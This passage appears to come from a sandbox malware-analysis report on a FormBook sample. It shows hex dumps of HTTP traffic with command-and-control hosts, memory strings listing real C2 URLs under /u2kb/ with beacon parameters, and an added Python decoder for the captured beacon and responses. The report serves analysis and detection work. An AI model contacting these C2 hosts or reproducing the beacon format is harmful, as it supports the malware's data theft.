22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 
63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:52:01 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 
75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.28expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://thedivinerudraksha.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 16:52:09 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 31 35 62 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 5d 6d 73 db 36 b6 fe 9c cc ec 7f 40 95 49 1d 35 22 45 52 92 e3 c8 b1 77 93 34 9d cd dc e6 26 93 a6 b3 b3 b7 b7 a3 81 48 48 42 4d 12 5c 00 b2 e4 2a da df 7e 07 00 29 82 14 40 d2 ce cb cd da 13 c7 02 1e 9c 73 70 70 f0 00 04 40 f8 d9 77 3f be 7d f9 e1 9f ef 5e 81 bf 7f 78 f3 f3 e5 5f ee 3f 5b f1 24 06 31 4c 97 17 3d 94 3a bf fe d2 93 89 08 46 97 7f b9 7f ef 59 82 38 04 e1 0a 52 86 f8 45 ef d7 0f 3f 39 67 3d 99 c1 31 8f d1 e5 3b b8 44 20 25 1c 2c c8 3a 8d c0 f7 0f ce 02 df 3f 07 1f 56 08 fc 88 af 71 8a c0 fb 75 44 e1 15 5b c1 67 43 55 e4 be 92 99 c2 04 5d 9c 50 32 27 9c 9d 80 90 a4 1c a5 fc e2 24 81 5b 07 27 70 89 9c 8c a2 6b 8c 36 d3 18 d2 25 3a 01 c3 cb fb cf 62 9c 5e 01 8a e2 8b 93 28 65 02 b0 40 3c 5c 9d 80 15 45 8b 8b 93 e1 90 af 50 24 b5 d2 42 a9 1b 92 a4 5b d9 05 49 39 73 97 84 2c 63 04 33 cc 0c 25 7b 30 e6 88 a6 90 a3 1e e0 37 19 ba e8 c1 2c 8b 71 08 39 26 e9 90 32 f6 78 9b c4 3d 20 ab 79 d1 33 f9 00 7c 4f e1 bf d6 e4 1c fc 84 50 d4 53 ba 7b 2b ce 33 36 b5 59 3f 5c 20 14 0d 7b 5f cc 92 97 24 49 50 ca d9 6d 4c 0a f3 32 ba 6d 65 a3 f6 44 b3 65 84 f2 de a1 59 7b 1b 1c f1 d5 45 84 ae 71 88 1c f9 61 00 70 8a 39 86 b1 c3 42 18 a3 0b bf 57 15 f2 cb 7f fd f3 dd ab d9 87 b7 6f 7f 7e f1 fc bd 26 a9 92 3e 7b f7 fc fd 2f af de cf 5e be 7d f3 ee f9 87 d7 2f 7e 7e 55 93 c2 57 28 41 4e 48 62 42 35 19 0f 16 68 7c 3a 2e 35 66 94 64 88 f2 9b 8b 1e 59 4e a5 d3 34 f0 2d 42 
dc 2c 70 4d 63 4d 9c 70 ad dd b3 eb e0 6a 3e 34 8b 89 89 f0 93 26 09 a5 33 d1 5b 4d 58 86 39 9a 09 0f 68 f0 ee 06 8b 88 d2 db 0e cd 85 3c 81 65 fc 26 46 00 47 17 27 1b 42 64 14 d0 10 39 38 8d 71 7a f8 2f 64 ec e4 f2 be ab 01 c0 82 d0 04 b8 e2 a7 43 c9 06 b8 14 fd 6b 8d 29 8a c0 0e 5c 63 86 e7 38 c6 fc 66 aa 7e 8f d1 39 d8 df 7f 36 94 aa 2a fd 56 a6 b0 15 42 fc 44 9a b0 66 8e ec b4 52 63 de 8f 8b c0 35 f5 e6 61 c8 d8 5f 17 30 c1 f1 cd c5 ab f8 f1 1b c4 18 a6 f8 e1 e8 f9 d8 f3 1e 3e 79 f9 2b 9d c3 14 33 9e 27 04 2f 27 f2 e7 a9 e7 7d ff c0 1b 9d 9d 47 98 65 31 bc b9 60 1b 98 a9 94 6b 44 2f 4e 5d df f5 4f 40 82 22 0c 2f 4e 60 1c d7 d9 c6 60 b5 4c aa 5b 6d 8f 89 4d e6 e4 6d 31 94 e1 cc 86 af 93 8c a2 3f a1 a8 90 f2 93 9b e0 d4 15 d5 13 26 9d b9 fe f8 96 16 e9 ad f9 39 ec 22 49 42 52 69 5e 16 af 97 38 65 43 4d c3 Data Ascii: 15bd]ms6@I5"ERw4&HHBM\*~)@spp@w?}^x_?[$1L=:FY8RE?9g=1;D %,:?VquD[
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:52:26 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
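          The two POST rows above are the sample's C2 beacons: a single form field, X51Qjm=, of declared length 188 bytes, sent to each host under /u2kb/ with an Internet Explorer 11 User-Agent. The rows after them are what those hosts answered: 403/404 pages from nginx, Apache, openresty and domain-parking services, several of them chunked and gzip-encoded, which is why their Data Ascii column is unreadable. The Python below is an added example and is not part of the Joe Sandbox report. It embeds two of the Data Raw dumps above, copied verbatim (the first POST body and the first nginx 404 body), and shows how to get back to the bytes on the wire: reverse the hex dump, undo chunked transfer coding, inflate the gzip body, and split the beacon into its field name, value and trailing NUL padding. The POST dump is 195 bytes while the request declares Content-Length: 188, so the decoder reports both the payload length and the padding rather than assuming the dump equals the body.

```python
"""Added example (not part of the Joe Sandbox report): decode the report's
"Data Raw" hex dumps of the FormBook C2 exchange back into bytes, strip the
HTTP framing, and pull apart the beacon body."""
import gzip

# Constructed inputs, copied verbatim from the report's "Data Raw" fields:
# the body of the POST to www.thedivinerudraksha.com/u2kb/ (declared
# Content-Length: 188) and the chunked, gzip-encoded body of the first
# nginx/1.18.0 "404 Not Found" response.
POST_BODY_HEX = (
    "58 35 31 51 6a 6d 3d 76 6b 52 79 55 54 39 48 56 37 31 4b 53 39 69 70 58 "
    "76 6c 62 5a 2d 54 52 6a 2d 42 6f 6b 59 51 73 52 45 6b 54 6f 4b 39 64 75 "
    "5a 43 34 65 75 6b 6a 35 6a 76 55 30 52 32 72 47 74 7e 63 4f 39 70 54 28 "
    "75 4a 6c 4f 4d 47 50 6d 6e 75 76 6d 70 62 69 65 73 38 32 31 49 63 74 65 "
    "59 51 61 48 5a 57 45 65 4b 70 71 69 6d 38 45 48 68 4b 41 62 7a 64 2d 31 "
    "61 32 6d 50 56 73 46 53 57 56 71 31 73 30 72 35 4e 63 38 39 75 50 59 77 "
    "6d 71 4b 38 34 73 48 4b 63 46 38 53 75 31 48 6a 77 4f 66 4a 4d 31 36 35 "
    "6a 66 6e 44 57 4e 61 70 55 61 62 7e 31 69 66 7e 67 29 2e 00 00 00 00 00 "
    "00 00 00"
)
RESPONSE_BODY_HEX = (
    "37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 "
    "48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b "
    "b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 "
    "64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a "
    "86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a "
    "30 0d 0a 0d 0a"
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """The report prints one space-separated hex pair per byte; fromhex skips the whitespace."""
    return bytes.fromhex(dump)


def dechunk(body: bytes) -> bytes:
    """Undo HTTP/1.1 chunked transfer coding: hex-size CRLF data CRLF ... 0 CRLF CRLF."""
    out = bytearray()
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)  # drop any chunk extension
        pos = line_end + 2
        if size == 0:  # last-chunk; trailer fields, if any, follow and are not needed here
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # step over the data and the CRLF that terminates it


def decode_response_body(dump: str, gzipped: bool) -> bytes:
    """Dechunk a captured response body; inflate it if the response said Content-Encoding: gzip."""
    raw = dechunk(hex_dump_to_bytes(dump))
    return gzip.decompress(raw) if gzipped else raw


def decode_beacon(dump: str) -> dict:
    """Split the captured POST body into its single form field.

    The dump is longer than the declared Content-Length (195 vs 188 bytes) and ends
    in NUL bytes, so those are separated out and counted instead of being treated
    as beacon content."""
    raw = hex_dump_to_bytes(dump)
    payload = raw.rstrip(b"\x00")
    name, sep, value = payload.decode("ascii").partition("=")
    if sep != "=":
        raise ValueError("body is not a single form-urlencoded field")
    return {
        "param": name,
        "value": value,
        "payload_len": len(payload),
        "nul_padding": len(raw) - len(payload),
        # Characters outside [A-Za-z0-9] tell you which alphabet a signature has to allow.
        "symbols": {ch for ch in value if not ch.isalnum()},
    }


if __name__ == "__main__":
    beacon = decode_beacon(POST_BODY_HEX)
    print(f"{beacon['param']}= : {beacon['payload_len']} payload bytes, "
          f"{beacon['nul_padding']} NUL padding, symbols {sorted(beacon['symbols'])}")
    print(decode_response_body(RESPONSE_BODY_HEX, gzipped=True).decode())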
          Source: cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://fonts.googleapis.com/css?family=Open
          Source: explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp
          String found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://justinmezzell.com
          Source: u8QPnVhq0N.exe
          String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.583702124.00000000161B6000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005C06000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pR
          Source: explorer.exe, 00000004.00000002.583702124.0000000015526000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000004F76000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iy
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.222ambking.org
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.222ambking.org/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.222ambking.org/u2kb/www.222ambking.org
          Source: explorer.exe, 00000004.00000003.561968971.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.344218674.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.580393358.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmp
          String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.avisrezervee.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.avisrezervee.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.avisrezervee.com/u2kb/www.avisrezervee.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.bitservicesltd.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://www.dzyngiri.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.ecomofietsen.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.employerseervices.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.employerseervices.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.employerseervices.com/u2kb/www.employerseervices.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.energyservicestation.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.energyservicestation.com/u2kb/
